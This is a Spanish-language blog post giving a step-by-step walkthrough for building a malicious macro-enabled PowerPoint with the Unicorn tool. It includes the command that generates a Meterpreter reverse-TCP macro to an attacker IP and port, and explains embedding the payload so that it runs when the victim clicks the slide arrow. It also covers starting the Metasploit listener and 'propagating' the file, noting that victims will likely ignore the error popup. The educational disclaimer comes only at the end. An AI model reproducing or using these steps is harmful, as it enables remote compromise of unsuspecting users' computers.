ExplotaciónMalware

Atacando a través de Macro Maliciosa en PowerPoint – Unicorn PowerShell Attack

death-by-ppt1

Autor:
Diego Jurado


Buenas a todos!!

En el día de hoy, os traigo una pequeña prueba de concepto (PoC), una técnica muy habitual y bien conocida en la cual crearemos un documento PowerPoint donde insertaremos una macro maliciosa que nos permitirá crear una sesión remota sobre el atacante que lo ejecute.

En primer lugar, para esta PoC utilizaré una máquina virtual Kali Linux 2016 (VMWare), y más adelante utilizaré una máquina Windows 7 para probar nuestro powerpoint malicioso.

Deberemos descargarnos la herramienta Unicorn.
Esta herramienta es un script escrito en Python y desarrollado por David Kennedy (Trustedsec) y que se basa en un downgrade en Powershell para inyectar un Shellcode en memoria.

unicorn
Podemos descargar la herramienta aquí: https://github.com/trustedsec/unicorn

Ejecutaremos la herramienta con el siguiente comando:

  • python unicorn.py
Se nos mostrarán todas las opciones de esta herramienta, entre las cuales encontraremos un ejemplo para la creación de una macro:

unicorn3

Ahora crearemos nuestra macro, utilizando una conexión reversa, donde pondré la IP de mi máquina Kali Linux (192.168.48.132), un puerto a utilizar (en este caso he usado el 443 pero podríamos usar cualquier otro):

  • python unicorn.py windows/meterpreter/reverse_tcp 192.168.48.132 443 macro

 

unicorn4
Tras ejecutar este comando, observamos los siguientes mensajes (los utilizaremos más adelante):
  1. El código se encuentra en el fichero de salida powershell_attack.txt
  2. Para poner la conexión a la escucha ejecutaremos el comando msfconsole -r unicorn.rc
Llegamos a la parte más importante de la PoC…
Primero, nos iremos a la máquina virtual de prueba, y crearemos un documento de Powerpoint (.ppt), borraremos el diseño predeterminado (yo he creado el mío propio) y pulsaremos en la opción Macro.

ppt
Le ponemos un nombre cualquiera a la macro (yo le puse AutoOpen), y se nos abrirá el editor de Microsoft Visual Basic para Aplicaciones, donde copiaremos el código generado por la herramienta Unicorn y que se encuentra en el archivo anteriormente mencionado: powershell_attack.txt 
 
macro
Una vez hecho esto, le damos a guardar, y guardamos el PowerPoint como «Presentación con Diapositivas de PowerPoint habilitada para macros (.ppsm)«. Este paso es importante ya que si no, las macros no se encontrarán habilitadas.
Lo que he hecho ahora, es configurar el documento, para que la macro se ejecute una vez el usuario pulse en la flecha de la portada de presentación. Para ello pulsaremos en la flecha y le daremos a Acción, donde se nos desplegará la siguiente ventana:

ppt2
Por otro lado, deberemos iniciar una sesión de metasploit para dejar una conexión a la escucha, para ello ejecutamos el siguiente comando:
  • msfconsole -r unicorn.rc
unicorn5
Finalizado este proceso, ya estaremos listos para propagar nuestro PowerPoint malicioso.
Simplemente, el usuario deberá abrir la presentación, y cuando pulse en la flecha para pasar de diapositiva, automáticamente saltará un pop-up de error y se nos cerrará la presentación.
Esto creará unos instantes de incertidumbre al usuario, pero seamos realistas, en el 90% de los casos no se le dará ninguna importancia.
Ahora solo debemos irnos a nuestra máquina de Kali y esperar las conexiones.
Seleccionaremos la sesión que queramos abrir, y ya tendremos nuestra sesión de meterpreter y acceso remoto a la víctima.
ppt4
Espero que os haya gustado, y como siempre digo, no nos hacemos responsables de su mal uso.
Esta prueba de concepto se ha realizado bajo un entorno controlado y con fines educativos, no seáis malos!!!!
Saludos! 😀

2 comentarios en “Atacando a través de Macro Maliciosa en PowerPoint – Unicorn PowerShell Attack

Los comentarios están cerrados.